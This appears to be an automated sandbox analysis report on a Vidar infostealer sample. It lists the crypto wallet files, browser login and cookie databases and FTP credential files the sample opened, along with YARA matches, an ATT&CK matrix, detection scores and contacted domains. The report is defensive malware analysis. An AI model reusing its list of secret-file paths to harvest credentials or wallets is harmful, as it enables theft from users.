Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: lets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: lets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: lets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: Predicted.pif, 00000012.00000002.4065342792.00000000013CD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: exodus.*
Source: Predicted.pif, 00000012.00000002.4065342792.00000000013CD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: ethereum.*
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: lets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: lets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: lets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: lets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Predicted.pif	Binary or memory string: WIN_81
Source: Predicted.pif	Binary or memory string: WIN_XP
Source: Predicted.pif	Binary or memory string: WIN_XPe
Source: Predicted.pif	Binary or memory string: WIN_VISTA
Source: Predicted.pif	Binary or memory string: WIN_7
Source: Predicted.pif	Binary or memory string: WIN_8
Source: Determined.8.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Predicted.pif PID: 7684, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 18.2.Predicted.pif.49a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Predicted.pif.1bac610.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Predicted.pif.17e8428.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Predicted.pif.1bac610.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Predicted.pif.17e8428.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000003.3398813743.00000000019AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4068055987.00000000049A1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4067329354.0000000001B7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.3403411125.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4066348704.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.3403233137.0000000001BAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.3401397681.0000000001911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4067329354.0000000001BAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Predicted.pif PID: 7684, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0027696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		18_2_0027696E
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00276E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		18_2_00276E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	21 Access Token Manipulation	12 Software Packing	NTDS	228 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 DLL Side-Loading	LSA Secrets	791 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	121 Masquerading	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	251 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	55%	ReversingLabs	Win32.Packed.Themida
file.exe	60%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Joe Sandbox ML
C:\ProgramData\EBGCFBGCBFHJ\JKJDBA	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seo[1].exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	55%	ReversingLabs	Win32.Packed.Themida

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
steamcommunity.com	0%	Virustotal		Browse
arpdabl.zapto.org	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://195.201.118.191GI	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
